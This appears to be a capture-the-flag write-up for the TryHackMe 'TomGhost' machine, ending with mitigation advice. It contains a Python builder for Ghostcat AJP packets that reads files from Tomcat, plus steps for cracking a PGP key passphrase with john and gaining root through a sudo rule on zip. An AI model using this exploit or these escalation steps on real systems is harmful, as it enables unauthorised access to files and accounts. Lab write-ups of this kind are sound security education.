TomGhost is an easy Linux machine featuring a vulnerable Apache JServ Protocol (AJP) 1.3 instance that can be used to read files from the deployed web application, including its source code. Once inside the machine, a sudo rule on the zip binary can be used to spawn a root shell.
There are 4 open ports on the target machine.
22 - SSH
53 - DNS
8009 - Apache JServ Protocol
8080 - Apache Tomcat
I searched for exploits related to AJP and found two interesting ones. I went with the second because I noticed its name, Ghostcat, matches the machine's name, TomGhost.
Running the exploit against port 8009 reveals a credential for the user skyfuck.
Use that credential to log in to the machine (SSH is open on port 22).
You can then grab the content of user.txt in merlin's home directory.
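To show what the Ghostcat request actually looks like on the wire, here is an added Python example (my own illustration, not the exploit script used above and not Tomcat code) that builds an AJP13 ForwardRequest carrying the javax.servlet.include.* attributes that make Tomcat's DefaultServlet serve a file from inside the web application, and decodes the AJP packets a container sends back. The file path, the request URI and the sample response bytes are constructed for illustration; sending the packet to port 8009 of a live target is deliberately left out so the block runs offline.

```python
import struct

# Wire constants from the public AJP13 protocol description.
CLIENT_MAGIC = b"\x12\x34"   # client (reverse proxy) -> servlet container
SERVER_MAGIC = b"AB"         # servlet container -> client
FORWARD_REQUEST = 2
METHOD_GET = 2
REQ_ATTRIBUTE = 0x0A         # generic name/value request attribute
REQUEST_TERMINATOR = b"\xff"
SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE = 3, 4, 5


def ajp_string(s):
    """AJP string: 2-byte big-endian length, bytes, NUL; None encodes as 0xFFFF (null string)."""
    if s is None:
        return b"\xff\xff"
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def ajp_int(n):
    """AJP integers are 2-byte big-endian."""
    return struct.pack(">H", n)


def build_forward_request(req_uri, attributes, server_name="localhost",
                          server_port=8009, headers=None):
    """Serialise a FORWARD_REQUEST packet for a GET with the given headers and attributes."""
    headers = headers or {}
    body = bytes([FORWARD_REQUEST, METHOD_GET])
    body += ajp_string("HTTP/1.1")
    body += ajp_string(req_uri)
    body += ajp_string("127.0.0.1")      # remote_addr: what the container logs as the client
    body += ajp_string(None)             # remote_host: not resolved
    body += ajp_string(server_name)
    body += ajp_int(server_port)
    body += b"\x00"                      # is_ssl = false
    body += ajp_int(len(headers))
    for name, value in headers.items():
        body += ajp_string(name) + ajp_string(value)
    for name, value in attributes.items():
        body += bytes([REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += REQUEST_TERMINATOR
    return CLIENT_MAGIC + ajp_int(len(body)) + body


def ghostcat_read_request(path, req_uri="/does-not-matter"):
    """Ghostcat-style read. The include.* attributes are normally set only by the
    container itself for RequestDispatcher.include(), but an AJP client can supply
    them directly, and DefaultServlet then serves `path` relative to the webapp root.
    The request URI only has to map to DefaultServlet (any unmapped path will do)."""
    return build_forward_request(req_uri, {
        "javax.servlet.include.request_uri": "/",
        "javax.servlet.include.path_info": path,
        "javax.servlet.include.servlet_path": "/",
    })


def server_packet(payload):
    """Frame a container->client payload as AB + length + payload (used to build sample data)."""
    return SERVER_MAGIC + ajp_int(len(payload)) + payload


def parse_response(data):
    """Walk container->client packets; return (HTTP status, concatenated body bytes)."""
    status, body, pos = None, b"", 0
    while pos + 4 <= len(data):
        if data[pos:pos + 2] != SERVER_MAGIC:
            raise ValueError("bad AJP magic at offset %d" % pos)
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        payload = data[pos + 4:pos + 4 + length]
        pos += 4 + length
        code = payload[0]
        if code == SEND_HEADERS:
            status = struct.unpack(">H", payload[1:3])[0]   # headers follow; not needed here
        elif code == SEND_BODY_CHUNK:
            chunk_len = struct.unpack(">H", payload[1:3])[0]
            body += payload[3:3 + chunk_len]                 # trailing NUL after the chunk is skipped
        elif code == END_RESPONSE:
            break
    return status, body


# Constructed sample response (not captured from any real target): 200 OK with no
# headers, one body chunk, then END_RESPONSE with the "reuse connection" flag set.
SAMPLE_WEB_XML = b"<web-app><!-- constructed sample, not the target's real file --></web-app>"
SAMPLE_RESPONSE = (
    server_packet(bytes([SEND_HEADERS]) + ajp_int(200) + ajp_string("OK") + ajp_int(0))
    + server_packet(bytes([SEND_BODY_CHUNK]) + ajp_int(len(SAMPLE_WEB_XML)) + SAMPLE_WEB_XML + b"\x00")
    + server_packet(bytes([END_RESPONSE]) + b"\x01")
)

if __name__ == "__main__":
    pkt = ghostcat_read_request("WEB-INF/web.xml")
    print("request packet (%d bytes): %s..." % (len(pkt), pkt[:16].hex()))
    print(parse_response(SAMPLE_RESPONSE))
```

The thing to notice is that nothing in the request is authenticated: whoever can reach the AJP port is trusted as if it were the front-end proxy, which is why an exposed 8009 is a finding on its own. Patched Tomcat releases changed the connector defaults so that AJP no longer listens on all interfaces and refuses requests without a configured shared secret, so the same packet is simply rejected there.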
Getting Merlin's Creds
Listing the files inside skyfuck's directory will give us a credential.pgp and a tryhackme.asc file. The .asc file is an exported PGP private key protected by a passphrase, which is what gpg2john extracts a hash from. Convert tryhackme.asc to a hash with gpg2john and crack it with john:
gpg2john tryhackme.asc > hash
Then import the tryhackme.asc key into gpg and decrypt credential.pgp using the cracked passphrase; the plaintext contains merlin's credential.
Logged in as merlin, sudo -l reveals that we can run the zip binary as root, which is enough for a root shell.
Go to https://gtfobins.github.io/gtfobins/zip/ and follow the sudo commands there. The trick is zip's archive-test options: -T tests the archive after creation and -TT lets you name the command used for that test, so under sudo that command runs as root.
- Keep the software you run up to date, and keep yourself updated on new vulnerabilities. For Tomcat specifically, disable the AJP connector in server.xml if no front-end proxy needs it; an AJP port reachable from the network is a finding by itself.
- Review the permissions of files, binaries and sudo rules on the system. A private key readable by another user and a sudo rule on a general-purpose binary like zip each handed over an account here.